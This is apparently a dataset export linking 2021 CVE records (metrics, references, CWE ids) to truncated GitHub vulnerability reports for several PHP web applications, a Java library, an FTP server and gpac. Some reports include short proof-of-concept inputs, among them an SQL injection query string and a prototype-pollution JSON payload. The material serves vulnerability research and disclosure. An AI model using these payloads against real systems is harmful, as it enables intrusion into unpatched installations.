cve_id stringlengths 13 16 | cve_published stringdate 2019-01-01 16:29:00 2025-02-25 20:15:37 | cve_descriptions stringlengths 34 2.6k | cve_metrics dict | cve_references listlengths 1 281 | cve_configurations listlengths 1 70 | cve_cwe_list listlengths 1 1 | cve_primary_cwe stringclasses 164
values | url stringlengths 36 97 | cve_tags listlengths 1 5 ⌀ | domain stringclasses 1
value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 198k ⌀ | issue_title stringlengths 1 335 | issue_comments_url stringlengths 55 116 | issue_comments_count int64 0 338 | issue_created_at stringdate 2012-06-06 09:34:24 2025-04-02 09:37:20 | issue_updated_at stringdate 2014-04-01 20:16:21 2025-06-16 12:26:58 | issue_html_url stringlengths 36 97 | issue_github_id int64 4.93M 2.97B | issue_number int64 1 199k | __index_level_0__ int64 0 6.55k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2021-40889 | 2021-10-11T10:15:07.697 | CMSUno version 1.7.2 is affected by a PHP code execution vulnerability. sauvePass action in {webroot}/uno/central.php file calls to file_put_contents() function to write username in password.php file when a user successfully changed their password. The attacker can inject malicious PHP code into password.php and then u... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/boiteasite/cmsuno/issues/19"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third P... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cmsuno_project:cmsuno:1.7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "52C39F4E-947F-4A8D-950F-D5FFDD33D12C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | [
"94"
] | 94 | https://github.com/boiteasite/cmsuno/issues/19 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"boiteasite",
"cmsuno"
] | Dear @boiteasite,
I found a security problem can lead to remote code execution in CMSUno version 1.7.2
# Description:
`sauvePass` action in `{webroot}/uno/central.php` file call to `file_put_contents()` function to write username to `password.php` file when user successfully changed password, Becase of filter withou... | PHP Code Execution via change password function | https://api.github.com/repos/boiteasite/cmsuno/issues/19/comments | 2 | 2021-09-09T04:11:04Z | 2021-09-10T13:33:35Z | https://github.com/boiteasite/cmsuno/issues/19 | 991,735,498 | 19 | 2,677 |
CVE-2021-40884 | 2021-10-11T11:15:09.547 | Projectsend version r1295 is affected by sensitive information disclosure. Because of not checking authorization in ids parameter in files-edit.php and id parameter in process.php function, a user with uploader role can download and edit all files of users in application. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"confidentialityImpact": "PARTIAL"... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/projectsend/projectsend/issues/992"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https:/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:projectsend:projectsend:r1295:*:*:*:*:*:*:*",
"matchCriteriaId": "2AF6F056-67CB-4B19-8673-8E59E95AAFF4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"862"
] | 862 | https://github.com/projectsend/projectsend/issues/992 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"projectsend",
"projectsend"
] | Dear @ignacionelson, @kwadrat ,
I have found an IDOR vulnerability in `Files` function.
# Description
Because of not checking authorization at `ids` parameter in `files-edit.php` and `id` parameter in `process.php`, The user with uploader role can `download`,`edit` all files of users in application
# To Reprodu... | Insecure Direct Object Reference in Files function | https://api.github.com/repos/projectsend/projectsend/issues/992/comments | 0 | 2021-09-07T05:13:56Z | 2021-09-07T05:22:44Z | https://github.com/projectsend/projectsend/issues/992 | 989,600,409 | 992 | 2,678 |
CVE-2021-40886 | 2021-10-11T11:15:09.590 | Projectsend version r1295 is affected by a directory traversal vulnerability. A user with Uploader role can add value `2` for `chunks` parameter to bypass `fileName` sanitization. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/projectsend/projectsend/issues/993"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https:/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:projectsend:projectsend:r1295:*:*:*:*:*:*:*",
"matchCriteriaId": "2AF6F056-67CB-4B19-8673-8E59E95AAFF4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"22"
] | 22 | https://github.com/projectsend/projectsend/issues/993 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"projectsend",
"projectsend"
] | Dear @ignacionelson,
I found a Path traversal vulnerability on your application!
# Description
Because of not checking if clause for `chunks` parameter when `chunks` >= 2, the user with Uploader role can add value `2` for `chunks` param to bypass `fileName` sanitizer

- In... | Path traversal in Upload file function | https://api.github.com/repos/projectsend/projectsend/issues/993/comments | 4 | 2021-09-07T07:07:48Z | 2023-01-19T20:50:48Z | https://github.com/projectsend/projectsend/issues/993 | 989,664,282 | 993 | 2,679 |
CVE-2021-40887 | 2021-10-11T11:15:09.633 | Projectsend version r1295 is affected by a directory traversal vulnerability. Because of lacking sanitization input for files[] parameter, an attacker can add ../ to move all PHP files or any file on the system that has permissions to /upload/files/ folder. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10,
"confidentialityImpact": "COMPLETE"... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/projectsend/projectsend/issues/994"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https:/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:projectsend:projectsend:r1295:*:*:*:*:*:*:*",
"matchCriteriaId": "2AF6F056-67CB-4B19-8673-8E59E95AAFF4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"22"
] | 22 | https://github.com/projectsend/projectsend/issues/994 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"projectsend",
"projectsend"
] | Dear @ignacionelson ,
I found a Path traversal vulnerability in import-orphans.php
# Description
Becase of lacking sanitization input for `files[]` parameter, The attacker can add `../` to move all of php files or any file on the system that has permissions to `/upload/files/` folder
 due to lack of sanitization when echo output data in returnFilesIds() function. A low privilege user can call this function through process.php file and execute scripting code. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/projectsend/projectsend/issues/995"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/projectsend/projectsend/rele... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:projectsend:projectsend:r1295:*:*:*:*:*:*:*",
"matchCriteriaId": "2AF6F056-67CB-4B19-8673-8E59E95AAFF4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"79"
] | 79 | https://github.com/projectsend/projectsend/issues/995 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"projectsend",
"projectsend"
] | Dear @ignacionelson,
I found a vulnerability that execute malicious script of user,
# Description:
Because of lacking of sanitizer when echo output data in returnFilesIds() function in `{webroot}/includes/Classes/Download.php` , the low privilege user (Uploader role) can call this function through process.php file ... | Reflected Cross-site Scripting in returnFilesIds() function | https://api.github.com/repos/projectsend/projectsend/issues/995/comments | 1 | 2021-09-08T02:13:10Z | 2021-09-10T13:43:02Z | https://github.com/projectsend/projectsend/issues/995 | 990,591,132 | 995 | 2,681 |
CVE-2021-40542 | 2021-10-11T13:15:07.417 | Opensis-Classic Version 8.0 is affected by cross-site scripting (XSS). An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/OS4ED/openSIS-Classic/issues/189"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Th... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "20B5286C-4CFF-4710-8D23-C76669FADFE7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding"... | [
"79"
] | 79 | https://github.com/OS4ED/openSIS-Classic/issues/189 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"OS4ED",
"openSIS-Classic"
] | # Description:
Because of lacking of sanitizer of input data at `$_REQUEST['link_url']` in `Ajax_url_encode.php` file, The Unauthenticated user can inject and execute javascript code on `link_url` parameter
 due to a lack of sanitization of input data at all upload functions in webroot/dzz/attach/Uploader.class.php and return a wrong response in content-type of output data in webroot/dzz/attach/controller.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/zyx0814/dzzoffice/issues/196"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third ... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dzzoffice:dzzoffice:2.02.1:*:*:*:*:*:*:*",
"matchCriteriaId": "0ECA901D-850D-468C-B516-01F29417313D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartE... | [
"79"
] | 79 | https://github.com/zyx0814/dzzoffice/issues/196 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"zyx0814",
"dzzoffice"
] | #Author: KietNA from 1nv1cta team, HPT CyberSecurity Center
#Email: kietnguyenanh9320@gmail.com
#Submit date: 28/08/2021
#Target: http://www.dzzoffice.com/
#Version: 2.02.1 (https://github.com/zyx0814/dzzoffice/releases/tag/2.02.1)
# Description:
Because of lacking of sanitizer of input data at all of upload fu... | Lacking of sanitizer fileName lead to Cross-site Scripting in Upload function | https://api.github.com/repos/zyx0814/dzzoffice/issues/196/comments | 1 | 2021-08-28T04:19:09Z | 2021-08-28T04:34:28Z | https://github.com/zyx0814/dzzoffice/issues/196 | 981,723,190 | 196 | 2,684 |
CVE-2021-40541 | 2021-10-11T14:15:07.647 | PHPFusion 9.03.110 is affected by cross-site scripting (XSS) in the preg patterns filter html tag without "//" in descript() function An authenticated user can trigger XSS by appending "//" in the end of text. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/PHPFusion/PHPFusion/issues/2373"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Thi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:php-fusion:phpfusion:9.03.110:*:*:*:*:*:*:*",
"matchCriteriaId": "29149A91-66BD-4C42-9D94-7EE9044F1727",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"79"
] | 79 | https://github.com/PHPFusion/PHPFusion/issues/2373 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"PHPFusion",
"PHPFusion"
] | #KietNA From Inv1cta Team, HPT Cyber Security Center
Sorry for bad english
**Describe the bug**
preg patterns filter html tag without "//" in descript() function, the authenticated user can trigger xss by append "//" in the end of text
**Version**
PHPFusion version: PHPFusion 9.03.110
**To Reproduce**
... | Bypass preg pattern lead to Cross-site Scripting in descript() function | https://api.github.com/repos/PHPFusion/PHPFusion/issues/2373/comments | 3 | 2021-08-25T03:33:12Z | 2021-09-01T11:22:54Z | https://github.com/PHPFusion/PHPFusion/issues/2373 | 978,672,135 | 2,373 | 2,685 |
CVE-2021-25738 | 2021-10-11T19:15:07.487 | Loading specially-crafted yaml with the Kubernetes Java Client library can lead to code execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2022/08/23/2"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https:... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:java:*:*:*:*:*:*:*:*",
"matchCriteriaId": "697973C0-82C4-45DD-9240-7722F8C2F229",
"versionEndExcluding": null,
"versionEndIncluding": "9.0.2",
"versionStartExcludi... | [
"502"
] | 502 | https://github.com/kubernetes-client/java/issues/1698 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"kubernetes-client",
"java"
] | A security issue was discovered in the Kubernetes Java client library where loading specially-crafted yaml can lead to code execution.
This issue has been rated Medium ([CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)), and assigne... | CVE-2021-25738: Code exec via yaml parsing | https://api.github.com/repos/kubernetes-client/java/issues/1698/comments | 0 | 2021-05-10T18:42:48Z | 2021-05-17T21:01:16Z | https://github.com/kubernetes-client/java/issues/1698 | 884,853,002 | 1,698 | 2,686 |
CVE-2021-40188 | 2021-10-11T19:15:07.547 | PHPFusion 9.03.110 is affected by an arbitrary file upload vulnerability. The File Manager function in admin panel does not filter all PHP extensions such as ".php, .php7, .phtml, .php5, ...". An attacker can upload a malicious file and execute code on the server. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/PHPFusion/PHPFusion/issues/2372"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Thi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:php-fusion:phpfusion:9.03.110:*:*:*:*:*:*:*",
"matchCriteriaId": "29149A91-66BD-4C42-9D94-7EE9044F1727",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"434"
] | 434 | https://github.com/PHPFusion/PHPFusion/issues/2372 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"PHPFusion",
"PHPFusion"
] | #By KietNA From Inv1cta team, HPT Cyber Security Center
**Describe the bug**
File Manager function in admin panel does not filter all of php extensions like ".php, .php7, .phtml, .php5, ...", The attacker can upload malicious file and execute code in server
**Version**
PHPFusion version: PHPFusion 9.03.110
*... | File Manager does not filter php extension lead to Upload malicious files | https://api.github.com/repos/PHPFusion/PHPFusion/issues/2372/comments | 3 | 2021-08-24T22:29:42Z | 2021-08-25T14:18:30Z | https://github.com/PHPFusion/PHPFusion/issues/2372 | 978,534,506 | 2,372 | 2,687 |
CVE-2021-40189 | 2021-10-11T19:15:07.587 | PHPFusion 9.03.110 is affected by a remote code execution vulnerability. The theme function will extract a file to "webroot/themes/{Theme Folder], where an attacker can access and execute arbitrary code. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/PHPFusion/PHPFusion/issues/2374"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Thi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:php-fusion:phpfusion:9.03.110:*:*:*:*:*:*:*",
"matchCriteriaId": "29149A91-66BD-4C42-9D94-7EE9044F1727",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"434"
] | 434 | https://github.com/PHPFusion/PHPFusion/issues/2374 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"PHPFusion",
"PHPFusion"
] | #KietNA From Inv1cta Team, HPT Cyber Security Center
**Describe the bug**
The attacker can abuse upload theme function to insert malicious php code or php file into zip file and upload to server, then the function will extract that file to "webroot/themes/[Theme Folder], the attacker can access and execute arbitrar... | PHP Code Execution Via Inject Malicious Code Or Create New Php File In Zip Theme | https://api.github.com/repos/PHPFusion/PHPFusion/issues/2374/comments | 4 | 2021-08-26T06:20:18Z | 2021-08-27T08:12:12Z | https://github.com/PHPFusion/PHPFusion/issues/2374 | 979,878,754 | 2,374 | 2,688 |
CVE-2021-40239 | 2021-10-11T19:15:07.627 | A Buffer Overflow vulnerability exists in the latest version of Miniftpd in the do_retr function in ftpproto.c | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Gabe-commiter/Miniftpd/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:miniftpd_project:miniftpd:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DB53EB04-E558-487B-9A5A-7D87699903DD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"120"
] | 120 | https://github.com/Gabe-commiter/Miniftpd/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Gabe-commiter",
"Miniftpd"
] | Hi @Gabe-commiter,
I found a issue, that can trigger buffer overflow on your application. The issue exists on `do_retr()` function (from line 706 to 791) on ftpproto.c
At glance, we can see you defined `char arg[MAX_ARG]; `, it's not problem, however, when you use `sprintf()` on line 718 and 721, they trigger buffe... | sprintf() trigger buffer overflow on `do_retr()` function | https://api.github.com/repos/Gabe-commiter/Miniftpd/issues/2/comments | 0 | 2021-08-24T18:07:12Z | 2021-08-24T18:07:12Z | https://github.com/Gabe-commiter/Miniftpd/issues/2 | 978,354,828 | 2 | 2,689 |
CVE-2021-40617 | 2021-10-11T19:15:07.667 | An SQL Injection vulnerability exists in openSIS Community Edition version 8.0 via ForgotPassUserName.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/OS4ED/openSIS-Classic/issues/192"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue ... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*",
"matchCriteriaId": "7159D18F-0406-4CBE-B985-FD2E8A5F07C9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"89"
] | 89 | https://github.com/OS4ED/openSIS-Classic/issues/192 | [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
] | github.com | [
"OS4ED",
"openSIS-Classic"
] | Hi @openSISAdmin, @ArnabOs4ed , I found a sql injection vulnerability in `ForgotPassUserName` function. I can inject special character in URL to escape SQL query in backend because of lacking of sanitize user input.
PoC:
`http://172.16.0.12:2222/ForgotPassUserName.php?used_for=username&u=admin%27%20or%20%271%27=%27... | SQL Injection in ForgotPassUserName | https://api.github.com/repos/OS4ED/openSIS-Classic/issues/192/comments | 3 | 2021-09-01T12:17:31Z | 2021-09-04T19:15:41Z | https://github.com/OS4ED/openSIS-Classic/issues/192 | 985,081,276 | 192 | 2,690 |
CVE-2021-23448 | 2021-10-11T21:15:07.480 | All versions of package config-handler are vulnerable to Prototype Pollution when loading config files. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jarradseers/config-handler/issues/1"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:config-handler_project:config-handler:1.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "45BF518C-C645-4580-A26D-AB71B5F9A686",
"versionEndExcluding": null,
"versionEndIncluding": null,
... | [
"1321"
] | 1321 | https://github.com/jarradseers/config-handler/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"jarradseers",
"config-handler"
] | Hey i recently found that your package is vulnerable to Prototype Pollution.
**poc.js**
```
const config = require('config-handler')();
console.log(test)
console.log(config)
```
**package.json**
```
{
"constructor":{
"prototype":
{"test":"polluted"}
}
}
```
_output_
`polluted` | Vulnerable to Prototype Pollution | https://api.github.com/repos/jarradseers/config-handler/issues/1/comments | 0 | 2021-08-15T13:34:55Z | 2021-08-15T13:34:55Z | https://github.com/jarradseers/config-handler/issues/1 | 971,135,657 | 1 | 2,691 |
CVE-2021-40292 | 2021-10-12T18:15:08.413 | A Stored Cross Site Sripting (XSS) vulnerability exists in DzzOffice 2.02.1 via the settingnew parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/zyx0814/dzzoffice/issues/195"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third ... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dzzoffice:dzzoffice:2.02.1:*:*:*:*:*:*:*",
"matchCriteriaId": "0ECA901D-850D-468C-B516-01F29417313D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartE... | [
"79"
] | 79 | https://github.com/zyx0814/dzzoffice/issues/195 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"zyx0814",
"dzzoffice"
] | # Description:
Because of lacking of sanitizer of input data, attacker can injection malicious code into `settingnew` param to trigger Stored-XSS. The
vulnerability can affected `settingnew[sitename]` and `settingnew[reglinkname]` in template **[Source]\admin\setting\template\main.htm**
# To Reproduce
## XSS... | Lacking of sanitizer of input data lead to Stored-XSS | https://api.github.com/repos/zyx0814/dzzoffice/issues/195/comments | 0 | 2021-08-28T04:05:10Z | 2021-09-07T03:12:53Z | https://github.com/zyx0814/dzzoffice/issues/195 | 981,720,526 | 195 | 2,692 |
CVE-2021-40618 | 2021-10-12T18:15:08.453 | An SQL Injection vulnerability exists in openSIS Classic 8.0 via the 1) ADDR_CONT_USRN, 2) ADDR_CONT_PSWD, 3) SECN_CONT_USRN or 4) SECN_CONT_PSWD parameters in HoldAddressFields.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/OS4ED/openSIS-Classic/issues/193"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Th... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*",
"matchCriteriaId": "7159D18F-0406-4CBE-B985-FD2E8A5F07C9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"89"
] | 89 | https://github.com/OS4ED/openSIS-Classic/issues/193 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"OS4ED",
"openSIS-Classic"
] | # Description:
Because of lacking of sanitizer of input data, attacker can injection malicious sql into query by control parameters such as `ADDR_CONT_USRN`, `ADDR_CONT_PSWD` or `SECN_CONT_USRN`, `SECN_CONT_PSWD` in file `HoldAddressFields.php`.
### Request
```
POST /HoldAddressFields.php HTTP/1.1
Host: 172.... | SQL Injection in file HoldAddressFields.php | https://api.github.com/repos/OS4ED/openSIS-Classic/issues/193/comments | 2 | 2021-09-01T12:48:52Z | 2021-09-09T22:20:28Z | https://github.com/OS4ED/openSIS-Classic/issues/193 | 985,110,700 | 193 | 2,693 |
CVE-2020-22673 | 2021-10-12T21:15:07.373 | Memory leak in the senc_Parse function in MP4Box in gpac 0.8.0 allows attackers to cause a denial of service (DoS) via a crafted input. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1342"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | [
"401"
] | 401 | https://github.com/gpac/gpac/issues/1342 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
[ √] I looked for a similar issue and couldn't find any.
[ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
[ √] I give enough informa... | There are memory leaks in the senc_Parse function of box_code_drm.c:1349 | https://api.github.com/repos/gpac/gpac/issues/1342/comments | 1 | 2019-11-13T04:06:43Z | 2020-01-09T17:59:51Z | https://github.com/gpac/gpac/issues/1342 | 521,946,411 | 1,342 | 2,694 |
CVE-2020-22674 | 2021-10-12T21:15:07.417 | An issue was discovered in gpac 0.8.0. An invalid memory dereference exists in the function FixTrackID located in isom_intern.c, which allows attackers to cause a denial of service (DoS) via a crafted input. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
